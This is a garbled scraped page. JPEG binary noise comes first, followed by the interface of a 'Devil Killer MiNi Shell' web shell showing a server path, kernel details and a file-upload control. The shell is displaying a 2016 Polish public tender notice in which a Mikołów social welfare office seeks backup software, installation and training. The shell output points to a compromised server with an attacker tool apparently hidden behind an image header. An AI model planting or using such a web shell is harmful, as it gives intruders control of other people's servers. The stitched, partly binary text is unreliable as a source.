JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161221/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161221/371773-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.mops.mikolow.pl/zamownienia-publiczne/zamownienia-publiczne-1' target='_blank'>http://www.mops.mikolow.pl/zamownienia-publiczne/zamownienia-publiczne-1</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 371773 - 2016
              z dnia 2016-12-21 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Mikołów: Zakup, dostawa oprogramowania ( 2 licencji) do tworzenia kopii zapasowych  oraz ich przywracania na 2 serwerach, wdrożenie oprogramowania w siedzibie zamawiającego oraz przeszkolenie 1 osoby w ilości min. 8 godzin do obsługi oprogramowania.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miejski Ośrodek Pomocy Społecznej, krajowy numer identyfikacyjny
              345536200000, ul.
              ul. Kolejowa 
              2,
              43-190  
              Mikołów, woj.
              śląskie, państwo
              Polska, tel.
              323 242 660, e-mail
              zamowienia@mops.mikolow.eu, faks
              323 242 694.
              <br />
              Adres strony internetowej (URL): http://www.mops.mikolow.pl/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Jednostki organizacyjne administracji samorządowej
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://www.mops.mikolow.pl/zamownienia-publiczne/zamownienia-publiczne-1</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pismnie<br />
                Adres:
                <br />Miejski Ośrodek Pomocy Społecznej w Mikołowie  ul. Kolejowa 2  43-190 Mikołów</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Zakup, dostawa oprogramowania ( 2 licencji) do tworzenia kopii zapasowych  oraz ich przywracania na 2 serwerach, wdrożenie oprogramowania w siedzibie zamawiającego oraz przeszkolenie 1 osoby w ilości min. 8 godzin do obsługi oprogramowania.<br /><b>Numer referencyjny: </b>PN-55/2016/MOPS<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Opis przedmiotu zamówienia:
Przedmiotem zamówienia na potrzeby Miejskiego Ośrodka Pomocy Społecznej w Mikołowie jest zakup , dostawa oprogramowania ( 2 licencji) do tworzenia kopii zapasowych  oraz ich przywracania na 2 serwerach, wdrożenie oprogramowania w siedzibie zamawiającego oraz przeszkolenie 1 osoby w ilości min. 8 godzin do obsługi oprogramowania.
Opis oprogramowania:
1.	Oprogramowanie powinno oferować backup serwerów pracujących pod systemami operacyjnymi takimi jak Windows Server min. w wersji 2008 R2,
2.	Kopia zapasowa (backup) obejmuje zawsze obraz dysku/partycji (system operacyjny wraz z konfiguracją, zainstalowanymi aplikacjami i plikami) i tworzona jest sektor po sektorze.
3.	Program nie wymaga instalacji oddzielnego serwera zarządzającego backupem. Kopia zapasowa jest wykonywana bezpośrednio na wskazany w zadaniu dysk lokalny lub dysk sieciowy.
4.	Proces tworzenia kopii zapasowych wykonywany jest w tle, w czasie normalnej pracy backupowanej maszyny i nie powoduje istotnego spowolnienia jego pracy.
5.	Istnieje możliwość wykonywania backupów pełnych i przyrostowych.
6.	Do wykonywania kopii zapasowej wykorzystywana jest technologia Microsoft VSS.
7.	Program wykorzystuje domyślnie sterownik VSS producenta tego oprogramowania.
8.	Możliwe jest tworzenie kopii zapasowej w trybie on-line tzn. podczas normalnej pracy maszyny, która obejmuje także pliki otwarte i systemowe.
9.	Podczas tworzenia backupu w postaci obrazu dysku, automatycznie muszą być backupowane wszystkie zbiory systemowe (także te chronione przed dostępem), wszystkie pliki (także otwarte w danym momencie), wszystkie aplikacje (także pracujące w danym momencie) oraz otwarte bazy MS SQL, MS Exchange, Active Directory, MS SharePoint, Oracle (od wersji 11g).
10.	Program musi umożliwiać wykonywanie kopii zapasowej dysku w trybie off-line czyli bez uruchamiania systemu operacyjnego z backupowanego dysku. Komputer powinien zostać uruchomiony w takim przypadku z płyty startowej CD lub pendrivea z systemem i oprogramowaniem dostarczanym przez producenta rozwiązania backupowego.
11.	Program pozwala na utworzenie w harmonogramie dowolnej liczby zadań wykonania kopii zapasowych.
12.	Musi istnieć możliwość wykonywania kopii zapasowej na dyski lokalne, dyski sieciowe, SAN, NAS, dyski USB (w tym 3.0), Firewire, 
13.	Program musi umożliwiać zdefiniowanie pod wybranymi nazwami miejsc, do których mogą być wykonywane kopie zapasowe. Miejsca te mogą następnie być wykorzystywane przy konfiguracji zadań backupu. 
14.	Program powinien pozwalać na podział pliku zawierającego backup obrazu dysku na mniejsze części (możliwość wprowadzenia wartości ręcznie).
15.	Zadania wykonania backupu tworzone w harmonogramie powinny umożliwiać zdefiniowanie następujących parametrów:
16.	- nazwa zadania,
- dysk lub partycja, która ma być w całości zbackupowana (utworzony obraz),
- lokalizacja, do której backup ma zostać zapisany
- czas i częstotliwość z jaką backup ma być wykonywany,
- rodzaju backupu jaki w danym zadaniu powinien zostać wykonany (pełny, przyrostowy),
- czy dane powinny zostać poddane kompresji w trakcie tworzenia backupu i jaki stopień ma zostać zastosowany (minimum dostępne 2 stopnie kompresji),
- czy backup powinien zostać zaszyfrowany i z wykorzystaniem jakiego algorytmu (dostępne minimum 3 algorytmy, w tym AES 256), 
- czy plik z backupem powinien zostać podzielony na mniejsze części i jakiej wielkości, 
- jaka część zasobów backupowanego komputera powinna być wykorzystywana przez proces backupu,
- komendy/skrypty jakie powinny zostać wykonane przed i po wykonaniu migawki systemu (snapshot),
- komendy/skrypty jakie powinny zostać wykonane przed i po zakończeniu zadania backupu. 
17.	Harmonogram powinien pozwalać na skonfigurowanie następujących schematów wykonywania backupu:
- natychmiastowe wykonanie backupu pełnego,
- określenie czasu, w którym jednorazowo ma zostać wykonany pełny backup (możliwość określenia dokładnej daty i godziny),

- backup w cyklu tygodniowym; określenie w które dni tygodnia i o której godzinie ma być wykonywany backup pełny oraz w które dni tygodnia, w jakich godzinach (np. od 8:00 do 16:00) i z jaką częstotliwością (np. co 15 minut) ma być wykonywany backup przyrostowy (inkrementacyjny),
- backup w cyklu miesięcznym; określenie w które dni miesiąca i o której godzinie mają być wykonywane backupy pełne oraz w które dni tygodnia, w jakich godzinach (np. od 8:00 do 16:00) i z jaką częstotliwością (np. co 1 godzinę) ma być wykonywany backup przyrostowy (inkrementacyjny),
- backup typu ciągłego pozwalający na jednorazowe wykonanie pełnego backupu, a wszystkie kolejne są backupami przyrostowymi (inkrementacyjnymi) wykonywanymi w określone dni tygodnia, w określonych godzinach (np. od 8:00 do 16:00) i z określoną częstotliwością (np. co 15 minut).
a.	- backup w cyklu mieszanym; określenie niestandardowej długości łańcucha backupu w oparciu o łączenie tygodni i miesięcy  program pozwala na utworzenie łańcucha składającego się z maksymalnie trzech tygodni i miesięcy. Istnieje możliwość określenia w które dni i o której godzinie mają być wykonywane backupy pełne oraz w które dni, w jakich godzinach (np. od 8:00 do 16:00) i z jaką częstotliwością (np. co 1 godzinę) ma być wykonywany backup przyrostowy (inkrementacyjny),
18.	Harmonogram musi umożliwiać cykliczne wykonywanie backupów przyrostowych (inkrementacyjnych) z częstotliwością nie mniejszą niż co 15 minut.
19.	Harmonogram zadań tworzenia backupów dla danej maszyny musi być przechowywany bezpośrednio na tej maszynie.
20.	Rozwiązanie musi pozwalać na okresową konsolidację łańcucha zależnych od siebie wzajemnie backupów przyrostowych utworzonych w trybie backupu ciągłego, tak aby nie dopuścić do jego nadmiernego wydłużenia. Musi istnieć możliwość zdefiniowania po jakim czasie backupy przyrostowe utworzone danego dnia zostaną skonsolidowane w jeden backup dzienny, backupy dzienne w backup tygodniowy a backupy tygodniowe w miesięczne. Program musi pozwalać na zdefiniowanie, który dzień jest traktowany do celów konsolidacji jako ostatni dzień tygodnia a który jako ostatni dzień miesiąca. 
21.	Rozwiązanie musi umożliwiać retencję tworzonych backupów. W szczególności musi pozwalać na zdefiniowanie po jakim czasie zostaną usunięte skonsolidowane backupy przyrostowe utworzone w ciągu danego dnia, po jakim czasie skonsolidowane backupy dzienne a po jakim skonsolidowane backupy tygodniowe.
22.	Opcja retencji musi umożliwiać przeniesienie plików skonsolidowanych backupów dziennych i tygodniowych do podkatalogów zamiast ich usuwania.
23.	Program musi pozwalać na zawarcie lub wykluczenie pustych sektorów na dysku podczas tworzenia kopii zapasowej.
24.	Podczas tworzenia każdej kopii zapasowej musi być generowany plik sumy kontrolnej (MD5) dla pliku kopii zapasowej. 
25.	Program może ignorować błędy odczytu z dysku i kontynuować proces tworzenia kopii zapasowej. 
26.	Dla każdego zadania wykonywania backupu musi być możliwość włączenia lub wyłączenia wykorzystania pamięci podręcznej (cache) w celu przyspieszenia procesu backupu. 
27.	W przypadku wykonywania komend/skryptów musi istnieć możliwość zdefiniowania czasu pomiędzy wykonaniem komendy/skryptu a kontynuacją działania przed lub po wykonaniu migawki/backupu.
28.	W programie musi być możliwość dodania komentarza do każdego zadania wykonania kopii zapasowej.
29.	Użytkownik musi mieć możliwość podglądu postępu w wykonaniu kopii zapasowej w czasie rzeczywistym.
30.	Program musi umożliwić wysyłanie informacji o wykonaniu lub niewykonaniu kopii zapasowej użytkownikowi w postaci wiadomości e-mail lub SMS.
31.	Program musi pozwalać na wykonywanie jednocześnie (równolegle) kopii zapasowych różnych woluminów dysku. 
32.	Program musi mieć możliwość automatycznego uruchomienia zadań, które nie zostały wykonane np. na skutek wyłączonego systemu lub braku dostępu do zasobów.
33.	Rozwiązanie musi umożliwiać tworzenie backupu przez łącze 3G i WiFi.
34.	Program posiada narzędzia pozwalające na automatyczną weryfikację tworzonych plików z backupem. Weryfikacja powinna odbywać się automatycznie natychmiast po utworzeniu backupu oraz powinno być możliwe ustawienie ponownej weryfikacji po zdefiniowanym okresie czasu. Dodatkowo, użytkownik musi mieć możliwość ręcznej weryfikacji plików wskazanych kopii zapasowych w dowolnym czasie.
35.	Musi istnieć możliwość ustawienia jak bardzo weryfikacja automatyczna może wykorzystywać zasoby komputera (od 1% do 100%).
36.	Program udostępnia narzędzie pozwalające na przekształcenie plików kopii zapasowej do plików dysków maszyn wirtualnych w formacie .VHD oraz .VMDK.
37.	Program umożliwia replikację wykonanych plików kopii zapasowych na dyski podłączone lokalnie.
38.	Program umożliwia replikację wykonanych plików kopii zapasowych na dyski sieciowe lub do lokalizacji zdalnych na serwer ftp.
39.	W przypadku replikacji do zdalnej lokalizacji backupów wykonywanych w trybie ciągłym, musi istnieć:
- możliwość dostarczenia do zdalnej lokalizacji pierwszego pełnego backup obrazu dysku celem uniknięcia konieczności jego transferu przez wolne łącza sieciowe. Po wgraniu pełnego backupu do określonego katalogu w zdalnej lokalizacji, kolejne aktualizacje przyrostowe (inkrementacyjne) będą automatycznie z nim powiązane,
- możliwość konsolidacji i retencji backupów w zdalnej lokalizacji w sposób niezależny od procesów konsolidacji i retencji backupu w lokalizacji źródłowej. W lokalizacji zdalnej dostępne muszą być identyczne możliwości konsolidacji i retencji jak dla backupu w lokalizacji źródłowej (wymaga dodatkowej licencji). 
40.	Program pozwala na jednoczesne tworzenie backupu obrazu dysku maszyny i odzyskiwanie z tworzonego backupu obrazu dysku na nowy wolumin fizyczny lub jako maszyny wirtualnej (pliki .VMDK i .VDH). Musi istnieć możliwość zdefiniowania opóźnienia z jakim aktualizacje inkrementacyjne backupu będą przenoszone na nowy wolumin (w zakresie od 1 godziny do 30 dni). 
41.	Możliwość przywrócenia w jednym kroku backupu całego obrazu dysku/partycji na nowym sprzęcie, na którym nie został wcześniej zainstalowany żaden system operacyjny (tzw. bare-metal recovery). Komputer powinien zostać uruchomiony z bootowalnej płyty CD lub bootowalnego pen drivea, z którego bezpośrednio zostaje uruchomiony proces odzyskiwania obrazu dysku z kopii zapasowej.  
42.	Możliwość przywrócenia z backupu obrazu dysku jak powyżej na zupełnie innym sprzęcie niż wykonywany był oryginalnie backup.
43.	Podczas odzyskiwania obrazu dysku na innym sprzęcie niż oryginalnie został wykonany backup, program automatycznie dopasuje sterowniki do nowego sprzętu a jeżeli jest to niemożliwe, umożliwia ich podanie przez użytkownika.
44.	Bez względu na rozmiar backupu program umożliwia uruchomienie w ciągu kilku minut obrazu dysku z kopii zapasowej jako maszyny wirtualnej w darmowym środowisku wirtualnym, dostępnym dla systemów Windows. Proces nie może opierać się o konwersję pliku backupu na plik dysku maszyny wirtualnej.
45.	Program umożliwia zamontowanie pliku kopii zapasowej jako dodatkowego dysku logicznego w trybie odczyt/zapis lub tylko-do-odczytu. Tak podłączony dysk logiczny pozwala użytkownikowi na przeglądanie a także modyfikowanie jego zawartości.
46.	Użytkownik musi mieć możliwość wyszukiwania i odzyskiwania pojedynczych plików lub folderów w kopiach zapasowych obrazu dysku.
47.	Program pozwala na podgląd w oknie programu historii wykonywanych backupów wraz z informacją, jaki backup został wykonany, jak długo był tworzony, jaka jest jego wielkość a także czy wystąpiły błędy podczas tworzenia danego pliku backupu.
48.	Możliwe jest selektywne odzyskiwanie z backupu obrazu dysku baz MS SQL oraz baz MS Exchange.
49.	Podczas przywracania obrazu dysku/partycji z kopii zapasowej, program umożliwi:
- uaktywnienie wybranej partycji,
- przywrócenia sektora MBR z tej kopii zapasowej,
- wgranie na dysk standardowego rekordu MBR,
- przywrócenie sygnatur dysku, 
- przywrócenie ukrytych ścieżek na dysku,
- dezaktywacji licencji systemu operacyjnego Windows. 
50.	Program pozwala na odzyskanie backupu obrazu dysku utworzonego na maszynie fizycznej na innej maszynie fizycznej (P2P) lub jako maszyny wirtualnej (P2V).
51.	Program pozwala na odzyskanie backupu obrazu dysku utworzonego na maszynie wirtualnej jako maszyny wirtualnej (V2V) lub na maszynie fizycznej (V2P).
52.	Producent rozwiązania udostępnia użytkownikom obraz płyty bootowalnej (plik .iso) pozwalający na przygotowanie płyty CD zawierającej środowisko bootowalne,  komplet programów pozwalających na odzyskanie z backupu obrazu dysku (bare metal restore) oraz sterowniki do sprzętu różnych producentów umożliwiające odzyskanie z backup obrazu dysku na innym sprzęcie.
53.	Producent rozwiązania udostępnia użytkownikom narzędzie do utworzenia obrazu płyty ratunkowej z możliwością dodania sterowników użytkownika.
54.	Z poziomu każdego zainstalowanego programu musi istnieć możliwość zdalnego zarządzania zadaniami backupu na innych maszynach, na których dane oprogramowanie jest zainstalowane
55.	Program musi umożliwiać pełną konfigurację i pełne zarządzanie zadaniami wykonywania kopii zapasowej na innych komputerach w sieci lokalnej, w zakresie identycznym jak z lokalnej konsoli administracyjnej. 
56.	Program musi posiadać możliwość tworzenia zadań za pomocą polityk dla grup stacji z poziomu konsoli webowej.
57.	Dostęp do programu ograniczony jest do użytkowników z prawami lokalnego administratora systemu.
58.	Z poziomu konsoli użytkownik może zdefiniować, do jakich miejsc ma być wykonywana replikacja plików kopii zapasowych (co najmniej na dyski lokalne, dyski USB, lokalizacje sieciowe, serwery ftp) oraz podgląd na aktualne miejsca replikacji.
59.	Program musi umożliwiać wysłanie powiadomień w postaci wiadomości e-mail w następujących przypadkach:
- zadanie backupu zakończyło się niepowodzeniem,
- przy rozpoczęciu zadania backupu,
a.	- przy zakończeniu zadania backupu,
b.	- podsumowaniu dziennej aktywności,
c.	- podsumowaniu tygodniowej aktywności,
d.	- podsumowaniu miesięcznej aktywności,
60.	Wsparcie techniczne dostępne w języku polskim. 
61.	Program dostępny jest w polskiej wersji językowej.

Licencja na oprogramowanie musi być bezterminowa.
Wykonawca ma obowiązek zapewnić  dostęp do pomocy technicznej oraz aktualizacji oprogramowania min. do 31.12.2017
Wdrożenie oprogramowania w siedzibie Zamawiającego , szkolenie w liczbie min. 8 godzin roboczych dla 1 osoby obejmujące: 
1.	Wdrożenie:
	Instalacja i konfiguracja oprogramowania w siedzibie Zamawiającego.
	Konfiguracja zasobów dyskowych na potrzeby repozytorium backupu 
	Instalacja oprogramowania do backupu na serwerach Zamawiającego
	Konfiguracja zasobów oprogramowania  repozytoria dyskowe. 
	Konfiguracja polityk backupu w myśl zaleceń zamawiającego 
	Konfiguracja replikacji danych backupowych 
	Testy backupu danych 
	Testy odtwarzania wybranych zasobów 

Szkolenie dla 1 osoby 
1) zakresu szkolenia:
a. wprowadzenie do oprogramowania 
b. zapoznanie z architektura rozwiązania 
c. instalacja oprogramowania 
d. konfiguracja zasobów 
e. zarządzanie zasobami 
f. konfiguracja polityk backupu 
g. raportowanie 
h. zaawansowane cechy oprogramowania i ich wykorzystanie 
i. odtwarzanie danych 
j. administrowanie systemem backupu 
2) Czas trwania szkolenia: minimum 8 godzin w godzinach pracy Zamawiającego. Możliwość realizacji w ciągu 2 dni roboczych po ustaleniu z Zamawiającym.

Zamawiający wymaga aby wykonawca w ofercie wyszczególnił oprogramowanie wraz z nazwą producenta.

<br /><br /><b>II.5) Główny kod CPV: </b>48000000-8<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 7<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
